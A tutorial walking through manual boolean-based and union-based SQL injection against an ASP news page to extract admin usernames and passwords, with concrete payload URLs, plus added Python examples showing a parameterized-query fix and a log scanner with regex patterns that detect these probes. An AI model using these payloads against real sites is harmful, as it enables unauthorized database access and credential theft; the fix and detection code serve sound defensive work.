SQL injection: manual injection and union injection

SQL injection: SQL commands are inserted into a web form, a domain name field or the query string of a page request, so that the server is tricked into executing malicious SQL commands.
Goal: obtain the database username and password.
1: Append [ ' ], [and 1=1] and [and 1=2] in turn to a link ending in { .asp?id=32 (any number) } to determine whether there is an injection point.
2: [and exists(select * from admin)], to guess the table name from the result the page returns.
3: [and exists(select admin from admin)], to guess the column name admin in the admin table.
4: [and (select top 1 len(admin) from admin)>1], to guess the field length.
5: [and (select top 1 asc(mid(admin,1,1)) from admin)>97], to guess the character at each position of the field by its ASCII value.
 
Example
Take a website:
HTTP://196.128.1.3:8008/onews.sap?id=40
1: http://196.128.1.3:8008/onews.sap?id=40 and 1=1 (the page displays normally)
2: http://196.128.1.3:8008/onews.sap?id=40 and 1=2 (the page shows a database error)
[If steps 1 and 2 behave this way, the page has SQL injection]
3: HTTP://196.128.1.3:8008/onews.sap?id=40 and exists(select * from admin) [The page displays normally, indicating that the table admin exists]
4: HTTP://196.128.1.3:8008/onews.sap?id=40 and exists(select password from admin) [the column password exists]
5: HTTP://196.128.1.3:8008/onews.sap?id=40 and exists(select admin from admin) [the column admin exists]
6: HTTP://196.128.1.3:8008/onews.sap?id=40 and (select top 1 len(admin) (or password) from admin)>1
[Page normal: the length of the admin (or password) field is greater than the number after >. Increase the number step by step until the page displays an error; that number is the maximum length of the field]
7: HTTP://196.128.1.3:8008/onews.sap?id=40 and (select top 1 asc(mid(admin [or password], 1 [or another position], 1)) from admin)>97 [compare against other ASCII values in the same way]
[Continue until the page displays a database error; this identifies the character of admin or password at that position]
8: Repeat the above steps to obtain the admin and password values of the page.
    Thought: since this is a repetitive process, could code be used instead of manual injection?
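The steps above work because the server concatenates the id value into its SQL statement, so the and 1=1 / and 1=2 pair turns the page into a true/false oracle. The following is an added example, not code from the original post: it builds a constructed in-memory SQLite table standing in for the news table (assumed name onews with an integer id column; not the site's real schema) and runs both probes against a concatenating handler and a parameterized one. SQLite has no top/len/asc functions, so only the boolean stage from steps 1 and 2 is reproduced.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the page's news table (assumed
    # name "onews", integer id column); not the site's real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE onews (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO onews VALUES (?, ?)",
                     [(40, "News item 40"), (41, "News item 41")])
    return conn


def fetch_news_vulnerable(conn, raw_id):
    # The query-string value is concatenated into the statement, so anything
    # after the number ("and 1=2", "union select ...") is parsed as SQL.
    sql = "SELECT title FROM onews WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def fetch_news_safe(conn, raw_id):
    # Validate the type, then bind the value: the driver sends it as data and
    # the database never parses it as SQL. int() rejects "40 and 1=1" with
    # ValueError, which a web handler would turn into a 400 response.
    news_id = int(raw_id)
    return [row[0] for row in
            conn.execute("SELECT title FROM onews WHERE id=?", (news_id,))]


def boolean_oracle_leaks(fetch, conn):
    # True when the two probes from the page produce different responses,
    # i.e. the handler hands out a true/false oracle. A rejected parameter
    # yields the same response for both probes, so there is no oracle.
    responses = []
    for probe in ("40 and 1=1", "40 and 1=2"):
        try:
            responses.append(("ok", fetch(conn, probe)))
        except ValueError:
            responses.append(("rejected", None))
    return responses[0] != responses[1]


if __name__ == "__main__":
    for name, handler in (("concatenated", fetch_news_vulnerable),
                          ("parameterized", fetch_news_safe)):
        leaks = boolean_oracle_leaks(handler, make_db())
        print(f"{name:13s} handler exposes a boolean oracle: {leaks}")
```

The concatenating handler returns one row for and 1=1 and none for and 1=2, which is exactly the normal-page/error-page difference the walkthrough relies on; the parameterized handler rejects both inputs identically, so the guessing loop in steps 4 to 8 has nothing to measure.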
 
 Union injection
1: HTTP://192.168.1.3:8008/onews.sap?id=36 order by 1 [try other numbers in turn; the number in order by is the count of columns in the query, so once the page no longer displays normally the column count has been exceeded]
2: HTTP://192.168.1.3:8008/onews.sap?id=36 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
[The page displays 2 and 3, indicating that positions 2 and 3 are shown on the page, where the admin and password columns can be substituted]
3: HTTP://192.168.1.3:8008/onews.sap?id=36 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
[The page now displays the admin and password values]
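Every stage of both walkthroughs leaves a recognisable request in the web server's access log: the and 1=1 / and 1=2 pair, exists(select ...), select top 1 len(...) / asc(...), the climbing order by N and finally union select. The following is an added example, not code from the original post: a small log scanner that URL-decodes each request, matches it against patterns built from those probes, and counts how many probe requests each client sent, since the repetitive guessing loop the post remarks on shows up as one address issuing many such requests. The log lines are constructed in Common Log Format with documentation addresses (192.0.2.x) and the page's own URLs.

```python
import re
from urllib.parse import unquote_plus

# Patterns derived from the probes the post walks through, matched
# case-insensitively against the URL-decoded request path.
PROBE_PATTERNS = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "table_column_guess": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "length_or_char_guess": re.compile(r"\bselect\s+top\s+1\s+(len|asc)\s*\(", re.I),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Common Log Format: ip ident user [timestamp] "METHOD url PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: one ordinary visitor (.10, .11) and one client
# (.77) running the manual and union stages from the post against onews.asp.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /onews.asp?id=40 HTTP/1.1" 200 5120
192.0.2.77 - - [10/Oct/2023:13:55:40 +0000] "GET /onews.asp?id=40%20and%201=1 HTTP/1.1" 200 5120
192.0.2.77 - - [10/Oct/2023:13:55:41 +0000] "GET /onews.asp?id=40%20and%201=2 HTTP/1.1" 500 812
192.0.2.77 - - [10/Oct/2023:13:55:50 +0000] "GET /onews.asp?id=40%20and%20exists(select*from%20admin) HTTP/1.1" 200 5120
192.0.2.77 - - [10/Oct/2023:13:56:02 +0000] "GET /onews.asp?id=40%20and%20(select%20top%201%20len(admin)%20from%20admin)>1 HTTP/1.1" 200 5120
192.0.2.77 - - [10/Oct/2023:13:57:10 +0000] "GET /onews.asp?id=36%20order%20by%2011 HTTP/1.1" 200 5120
192.0.2.77 - - [10/Oct/2023:13:57:30 +0000] "GET /onews.asp?id=36%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admin HTTP/1.1" 200 5300
192.0.2.11 - - [10/Oct/2023:13:58:00 +0000] "GET /onews.asp?id=41 HTTP/1.1" 200 5100
"""


def classify_request(url):
    """Return the names of every probe pattern the decoded URL matches."""
    decoded = unquote_plus(url)  # %20 and + both become spaces
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]


def scan_log(lines):
    """Yield (ip, url, matched_patterns, status) for each probe-like request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        hits = classify_request(m["url"])
        if hits:
            findings.append((m["ip"], m["url"], hits, m["status"]))
    return findings


def probes_per_client(lines, threshold=3):
    """Clients that sent at least `threshold` probe requests; the guessing
    loop from the post produces dozens from a single address."""
    counts = {}
    for ip, _url, _hits, _status in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, url, hits, status in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {','.join(hits):22s} {unquote_plus(url)}")
    print("suspect clients:", probes_per_client(SAMPLE_LOG.splitlines()))
```

Matching on decoded text matters because the spaces in every probe arrive as %20 or +; a pattern applied to the raw log line would miss all of them. Pair the per-client count with the status column: a run of 500s interleaved with 200s from one address is the true/false oracle being read out.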
  
